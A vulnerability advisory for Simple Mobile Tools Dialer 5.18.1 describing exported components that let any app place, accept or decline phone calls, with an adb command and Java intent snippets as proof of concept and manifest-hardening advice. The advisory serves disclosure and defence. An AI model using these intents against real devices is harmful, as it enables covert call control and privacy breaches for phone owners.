A severe security vulnerability has been identified in the com.simplemobiletools.dialer Android application. The app's DialerActivity and CallActionReceiver can be externally manipulated to initiate and control calls without user interaction or consent.
- Name: com.simplemobiletools.dialer
- Version: Version 5.18.1
The application's DialerActivity and CallActionReceiver are improperly exposed to external intent calls, allowing any application to initiate, accept, or decline phone calls.
- Unauthorized Call Initiation and Control: Potential for an external entity to initiate and control phone calls, leading to privacy breaches and unauthorized usage of telephony services.
The vulnerability can be demonstrated using the following ADB command:
adb shell am start -a android.intent.action.CALL -d tel:8008000000 -n com.simplemobiletools.dialer/.activities.DialerActivity// Java PoC to Accept a Call
Intent acceptCallIntent = new Intent("com.simplemobiletools.dialer.action.ACCEPT_CALL");
context.sendBroadcast(acceptCallIntent);// Java PoC to Decline a Call
Intent declineCallIntent = new Intent("com.simplemobiletools.dialer.action.DECLINE_CALL");
context.sendBroadcast(declineCallIntent);- Restrict Intent Exposure: Ensure that
DialerActivityandCallActionReceiveronly respond to intents from trusted sources. - Implement User Consent: Enforce explicit user consent for sensitive actions like call handling.
- Security Audit: Conduct a thorough review of the application to identify and address any security vulnerabilities.
- Update Manifest: Revisit the app's manifest to tighten the exposure of activities and receivers.
The identified vulnerability represents a significant risk to user privacy and security. Prompt action is recommended to address these issues and safeguard the application's users.